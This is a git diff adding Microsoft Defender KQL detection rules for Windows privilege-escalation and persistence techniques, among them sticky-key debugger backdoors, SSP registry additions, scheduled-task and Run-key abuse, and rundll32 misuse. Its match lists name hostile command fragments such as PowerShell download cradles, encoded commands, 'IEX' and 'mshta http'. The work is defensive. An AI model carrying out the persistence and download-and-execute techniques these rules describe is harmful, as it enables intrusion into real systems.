MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.discovery, attack.t1033 + +DeviceProcessEvents +| where (ProcessCommandLine contains " /priv" or ProcessCommandLine contains " -priv") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql b/KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql new file mode 100644 index 00000000..e834eadf --- /dev/null +++ b/KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql @@ -0,0 +1,11 @@ +// Title: Security Support Provider (SSP) Added to LSA Configuration +// Author: iwillkeepwatch +// Date: 2019-01-18 +// Level: high +// Description: Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.005 + +DeviceRegistryEvents +| where (RegistryKey endswith "\\Control\\Lsa\\Security Packages" or RegistryKey endswith "\\Control\\Lsa\\OSConfig\\Security Packages") and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\system32\\msiexec.exe", "C:\\Windows\\syswow64\\MsiExec.exe")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/session_manager_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/session_manager_autorun_keys_modification.kql new file mode 100644 index 00000000..f436c7d2 --- /dev/null +++ b/KQL/rules/Privilege Escalation/session_manager_autorun_keys_modification.kql @@ -0,0 +1,13 @@ +// Title: Session Manager Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, attack.t1546.009 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents +| where RegistryKey contains "\\System\\CurrentControlSet\\Control\\Session Manager" and (RegistryKey contains "\\SetupExecute" or RegistryKey contains "\\S0InitialCommand" or RegistryKey contains "\\KnownDlls" or RegistryKey contains "\\Execute" or RegistryKey contains "\\BootExecute" or RegistryKey contains "\\AppCertDlls") and (not(RegistryValueData =~ "(Empty)")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql b/KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql new file mode 100644 index 00000000..b81cd9e0 --- /dev/null +++ b/KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql @@ -0,0 +1,15 @@ +// Title: Setup16.EXE Execution With Custom .Lst File +// Author: frack113 +// Date: 2024-12-01 +// Level: medium +// Description: Detects the execution of "Setup16.EXE" and old installation utility with a custom ".lst" file. +These ".lst" file can contain references to external program that "Setup16.EXE" will execute. +Attackers and adversaries might leverage this as a living of the land utility. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.005 +// False Positives: +// - On modern Windows system, the "Setup16" utility is practically never used, hence false positive should be very rare. + +DeviceProcessEvents +| where (InitiatingProcessCommandLine contains " -m " and InitiatingProcessFolderPath =~ "C:\\Windows\\SysWOW64\\setup16.exe") and (not(FolderPath startswith "C:\\~MSSETUP.T\\")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/startup_folder_file_write.kql b/KQL/rules/Privilege Escalation/startup_folder_file_write.kql new file mode 100644 index 00000000..7560d036 --- /dev/null +++ b/KQL/rules/Privilege Escalation/startup_folder_file_write.kql @@ -0,0 +1,12 @@ +// Title: Startup Folder File Write +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-05-02 +// Level: medium +// Description: A General detection for files being created in the Windows startup directory. This could be an indicator of persistence. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate + +DeviceFileEvents +| where FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp" and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wuauclt.exe" or FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\"))) and (not((InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" and FolderPath endswith "\\Send to OneNote.lnk"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_execution.kql b/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_execution.kql new file mode 100644 index 00000000..37ffef1f --- /dev/null +++ b/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_execution.kql @@ -0,0 +1,12 @@ +// Title: Sticky Key Like Backdoor Execution +// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community +// Date: 2018-03-15 +// Level: critical +// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "Magnify.exe" or ProcessCommandLine contains "Narrator.exe" or ProcessCommandLine contains "DisplaySwitch.exe") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wt.exe") and InitiatingProcessFolderPath endswith "\\winlogon.exe" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_usage_registry.kql b/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_usage_registry.kql new file mode 100644 index 00000000..f9739905 --- /dev/null +++ b/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_usage_registry.kql @@ -0,0 +1,12 @@ +// Title: Sticky Key Like Backdoor Usage - Registry +// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community +// Date: 2018-03-15 +// Level: critical +// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\HelpPane.exe\\Debugger" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql b/KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql new file mode 100644 index 00000000..88a2255e --- /dev/null +++ b/KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Autorun Registry Modified via WMI +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-02-17 +// Level: high +// Description: Detects suspicious activity where the WMIC process is used to create an autorun registry entry via reg.exe, which is often indicative of persistence mechanisms employed by malware. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1547.001, attack.t1047 +// False Positives: +// - Legitimate administrative activity or software installations + +DeviceProcessEvents +| where (((ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run") and (ProcessCommandLine contains "reg" and ProcessCommandLine contains " add ")) and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe" or InitiatingProcessFolderPath endswith "\\wmiprvse.exe")) and ((ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\ProgramData'" or ProcessCommandLine contains ":\\Windows\\Temp" or ProcessCommandLine contains ":\\Temp" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming" or ProcessCommandLine contains ":\\$Recycle.bin" or ProcessCommandLine contains ":\\Users\\Default" or ProcessCommandLine contains ":\\Users\\public" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%Public%" or ProcessCommandLine contains "%AppData%") or (ProcessCommandLine contains ":\\Users\\" and (ProcessCommandLine contains "\\Favorites" or ProcessCommandLine contains "\\Favourites" or ProcessCommandLine contains "\\Contacts" or ProcessCommandLine contains "\\Music" or ProcessCommandLine contains "\\Pictures" or ProcessCommandLine contains "\\Documents" or ProcessCommandLine contains "\\Photos"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_command_patterns_in_scheduled_task_creation.kql b/KQL/rules/Privilege Escalation/suspicious_command_patterns_in_scheduled_task_creation.kql new file mode 100644 index 00000000..fabfa3f6 --- /dev/null +++ b/KQL/rules/Privilege Escalation/suspicious_command_patterns_in_scheduled_task_creation.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Command Patterns In Scheduled Task Creation +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-23 +// Level: high +// Description: Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005 +// False Positives: +// - Software installers that run from temporary folders and also install scheduled tasks are expected to generate some false positives + +DeviceProcessEvents +| where (ProcessCommandLine contains "/Create " and FolderPath endswith "\\schtasks.exe") and (((ProcessCommandLine contains "/sc minute " or ProcessCommandLine contains "/ru system ") and (ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd /r" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r ")) or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -w hidden " or ProcessCommandLine contains " bypass " or ProcessCommandLine contains " IEX" or ProcessCommandLine contains ".DownloadData" or ProcessCommandLine contains ".DownloadFile" or ProcessCommandLine contains ".DownloadString" or ProcessCommandLine contains "/c start /min " or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "mshta http" or ProcessCommandLine contains "mshta.exe http") or ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Tmp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%") and (ProcessCommandLine contains "cscript" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "wscript"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_desktop_ini_action.kql b/KQL/rules/Privilege Escalation/suspicious_desktop_ini_action.kql new file mode 100644 index 00000000..644ebc14 --- /dev/null +++ b/KQL/rules/Privilege Escalation/suspicious_desktop_ini_action.kql @@ -0,0 +1,13 @@ +// Title: Suspicious desktop.ini Action +// Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO) +// Date: 2020-03-19 +// Level: medium +// Description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009 +// False Positives: +// - Operations performed through Windows SCCM or equivalent +// - Read only access list authority + +DeviceFileEvents +| where FolderPath endswith "\\desktop.ini" and (not(((InitiatingProcessFolderPath startswith "C:\\Windows\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\JetBrains\\Toolbox\\bin\\7z.exe" and FolderPath contains "\\JetBrains\\apps\\") or FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_driver_install_by_pnputil_exe.kql b/KQL/rules/Privilege Escalation/suspicious_driver_install_by_pnputil_exe.kql new file mode 100644 index 00000000..b804bf04 --- /dev/null +++ b/KQL/rules/Privilege Escalation/suspicious_driver_install_by_pnputil_exe.kql @@ -0,0 +1,14 @@ +// Title: Suspicious Driver Install by pnputil.exe +// Author: Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger +// Date: 2021-09-30 +// Level: medium +// Description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547 +// False Positives: +// - Pnputil.exe being used may be performed by a system administrator. +// - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. +// - Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + +DeviceProcessEvents +| where (ProcessCommandLine contains "-i" or ProcessCommandLine contains "/install" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/add-driver" or ProcessCommandLine contains ".inf") and FolderPath endswith "\\pnputil.exe" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql b/KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql new file mode 100644 index 00000000..26d01298 --- /dev/null +++ b/KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Get-Variable.exe Creation +// Author: frack113 +// Date: 2022-04-23 +// Level: high +// Description: Get-Variable is a valid PowerShell cmdlet +WindowsApps is by default in the path where PowerShell is executed. +So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546, attack.defense-evasion, attack.t1027 + +DeviceFileEvents +| where FolderPath endswith "Local\\Microsoft\\WindowsApps\\Get-Variable.exe" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_grpconv_execution.kql b/KQL/rules/Privilege Escalation/suspicious_grpconv_execution.kql new file mode 100644 index 00000000..8e91a9e5 --- /dev/null +++ b/KQL/rules/Privilege Escalation/suspicious_grpconv_execution.kql @@ -0,0 +1,10 @@ +// Title: Suspicious GrpConv Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-05-19 +// Level: high +// Description: Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547 + +DeviceProcessEvents +| where ProcessCommandLine contains "grpconv.exe -o" or ProcessCommandLine contains "grpconv -o" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_gup_usage.kql b/KQL/rules/Privilege Escalation/suspicious_gup_usage.kql new file mode 100644 index 00000000..a6918cf2 --- /dev/null +++ b/KQL/rules/Privilege Escalation/suspicious_gup_usage.kql @@ -0,0 +1,12 @@ +// Title: Suspicious GUP Usage +// Author: Florian Roth (Nextron Systems) +// Date: 2019-02-06 +// Level: high +// Description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Execution of tools named GUP.exe and located in folders different than Notepad++\updater + +DeviceProcessEvents +| where FolderPath endswith "\\GUP.exe" and (not(((FolderPath endswith "\\Program Files\\Notepad++\\updater\\GUP.exe" or FolderPath endswith "\\Program Files (x86)\\Notepad++\\updater\\GUP.exe") or (FolderPath contains "\\Users\\" and (FolderPath endswith "\\AppData\\Local\\Notepad++\\updater\\GUP.exe" or FolderPath endswith "\\AppData\\Roaming\\Notepad++\\updater\\GUP.exe"))))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql b/KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql new file mode 100644 index 00000000..1b1cc9ae --- /dev/null +++ b/KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Modification Of Scheduled Tasks +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-28 +// Level: high +// Description: Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location +Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on +Instead they modify the task after creation to include their malicious payload + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005 + +DeviceProcessEvents +| where ((ProcessCommandLine contains " /Change " and ProcessCommandLine contains " /TN ") and FolderPath endswith "\\schtasks.exe") and (ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "bash.exe" or ProcessCommandLine contains "bash " or ProcessCommandLine contains "scrcons" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "forfiles" or ProcessCommandLine contains "scriptrunner" or ProcessCommandLine contains "hh.exe" or ProcessCommandLine contains "hh ") and (ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\WINDOWS\\Temp\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Perflogs\\" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "%comspec%" or ProcessCommandLine contains "%localappdata%") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql b/KQL/rules/Privilege Escalation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql new file mode 100644 index 00000000..4e57804a --- /dev/null +++ b/KQL/rules/Privilege Escalation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql @@ -0,0 +1,10 @@ +// Title: Suspicious NTLM Authentication on the Printer Spooler Service +// Author: Elastic (idea), Tobias Michalski (Nextron Systems) +// Date: 2022-05-04 +// Level: high +// Description: Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.credential-access, attack.t1212 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "spoolss" or ProcessCommandLine contains "srvsvc" or ProcessCommandLine contains "/print/pipe/") and (ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and ProcessCommandLine contains "http")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_outlook_macro_created.kql b/KQL/rules/Privilege Escalation/suspicious_outlook_macro_created.kql new file mode 100644 index 00000000..03b15421 --- /dev/null +++ b/KQL/rules/Privilege Escalation/suspicious_outlook_macro_created.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Outlook Macro Created +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-08 +// Level: high +// Description: Detects the creation of a macro file for Outlook. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546 +// False Positives: +// - Unlikely + +DeviceFileEvents +| where FolderPath endswith "\\Microsoft\\Outlook\\VbaProject.OTM" and (not(InitiatingProcessFolderPath endswith "\\outlook.exe")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_powershell_in_registry_run_keys.kql b/KQL/rules/Privilege Escalation/suspicious_powershell_in_registry_run_keys.kql new file mode 100644 index 00000000..475966e9 --- /dev/null +++ b/KQL/rules/Privilege Escalation/suspicious_powershell_in_registry_run_keys.kql @@ -0,0 +1,12 @@ +// Title: Suspicious PowerShell In Registry Run Keys +// Author: frack113, Florian Roth (Nextron Systems) +// Date: 2022-03-17 +// Level: medium +// Description: Detects potential PowerShell commands or code within registry run keys +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate admin or third party scripts. Baseline according to your environment + +DeviceRegistryEvents +| where (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh " or RegistryValueData contains "FromBase64String" or RegistryValueData contains ".DownloadFile(" or RegistryValueData contains ".DownloadString(" or RegistryValueData contains " -w hidden " or RegistryValueData contains " -w 1 " or RegistryValueData contains "-windowstyle hidden" or RegistryValueData contains "-window hidden" or RegistryValueData contains " -nop " or RegistryValueData contains " -encodedcommand " or RegistryValueData contains "-ExecutionPolicy Bypass" or RegistryValueData contains "Invoke-Expression" or RegistryValueData contains "IEX (" or RegistryValueData contains "Invoke-Command" or RegistryValueData contains "ICM -" or RegistryValueData contains "Invoke-WebRequest" or RegistryValueData contains "IWR " or RegistryValueData contains "Invoke-RestMethod" or RegistryValueData contains "IRM " or RegistryValueData contains " -noni " or RegistryValueData contains " -noninteractive ") and (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_run_key_from_download.kql b/KQL/rules/Privilege Escalation/suspicious_run_key_from_download.kql new file mode 100644 index 00000000..bc2e8ac4 --- /dev/null +++ b/KQL/rules/Privilege Escalation/suspicious_run_key_from_download.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Run Key from Download +// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poude (Nextron Systems) +// Date: 2019-10-01 +// Level: high +// Description: Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Software installers downloaded and used by users + +DeviceRegistryEvents +| where (InitiatingProcessFolderPath contains "\\AppData\\Local\\Packages\\Microsoft.Outlook_" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\Olk\\Attachments\\" or InitiatingProcessFolderPath contains "\\Downloads\\" or InitiatingProcessFolderPath contains "\\Temporary Internet Files\\Content.Outlook\\" or InitiatingProcessFolderPath contains "\\Local Settings\\Temporary Internet Files\\") and (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_runas_like_flag_combination.kql b/KQL/rules/Privilege Escalation/suspicious_runas_like_flag_combination.kql new file mode 100644 index 00000000..31e5d8f5 --- /dev/null +++ b/KQL/rules/Privilege Escalation/suspicious_runas_like_flag_combination.kql @@ -0,0 +1,10 @@ +// Title: Suspicious RunAs-Like Flag Combination +// Author: Florian Roth (Nextron Systems) +// Date: 2022-11-11 +// Level: medium +// Description: Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation + +DeviceProcessEvents +| where (ProcessCommandLine contains " -c cmd" or ProcessCommandLine contains " -c \"cmd" or ProcessCommandLine contains " -c powershell" or ProcessCommandLine contains " -c \"powershell" or ProcessCommandLine contains " --command cmd" or ProcessCommandLine contains " --command powershell" or ProcessCommandLine contains " -c whoami" or ProcessCommandLine contains " -c wscript" or ProcessCommandLine contains " -c cscript") and (ProcessCommandLine contains " -u system " or ProcessCommandLine contains " --user system " or ProcessCommandLine contains " -u NT" or ProcessCommandLine contains " -u \"NT" or ProcessCommandLine contains " -u 'NT" or ProcessCommandLine contains " --system " or ProcessCommandLine contains " -u administrator ") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_rundll32_invoking_inline_vbscript.kql b/KQL/rules/Privilege Escalation/suspicious_rundll32_invoking_inline_vbscript.kql new file mode 100644 index 00000000..ff0ca567 --- /dev/null +++ b/KQL/rules/Privilege Escalation/suspicious_rundll32_invoking_inline_vbscript.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Rundll32 Invoking Inline VBScript +// Author: Florian Roth (Nextron Systems) +// Date: 2021-03-05 +// Level: high +// Description: Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452 +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055 + +DeviceProcessEvents +| where ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains "Execute" and ProcessCommandLine contains "RegRead" and ProcessCommandLine contains "window.close" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_involving_temp_folder.kql b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_involving_temp_folder.kql new file mode 100644 index 00000000..b6d74d19 --- /dev/null +++ b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_involving_temp_folder.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Scheduled Task Creation Involving Temp Folder +// Author: Florian Roth (Nextron Systems) +// Date: 2021-03-11 +// Level: high +// Description: Detects the creation of scheduled tasks that involves a temporary folder and runs only once +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005 +// False Positives: +// - Administrative activity +// - Software installation + +DeviceProcessEvents +| where (ProcessCommandLine contains " /create " and ProcessCommandLine contains " /sc once " and ProcessCommandLine contains "\\Temp\\") and FolderPath endswith "\\schtasks.exe" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql new file mode 100644 index 00000000..c3cfc582 --- /dev/null +++ b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Scheduled Task Creation via Masqueraded XML File +// Author: Swachchhanda Shrawan Poudel, Elastic (idea) +// Date: 2023-04-20 +// Level: medium +// Description: Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.defense-evasion, attack.persistence, attack.t1036.005, attack.t1053.005 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "/create" or ProcessCommandLine contains "-create") and (ProcessCommandLine contains "/xml" or ProcessCommandLine contains "-xml") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains ".xml" or ((InitiatingProcessCommandLine contains ":\\WINDOWS\\Installer\\MSI" and InitiatingProcessCommandLine contains ".tmp,zzzzInvokeManagedCustomActionOutOfProc") and InitiatingProcessFolderPath endswith "\\rundll32.exe") or (ProcessIntegrityLevel in~ ("System", "S-1-16-16384"))))) and (not(((InitiatingProcessFolderPath contains 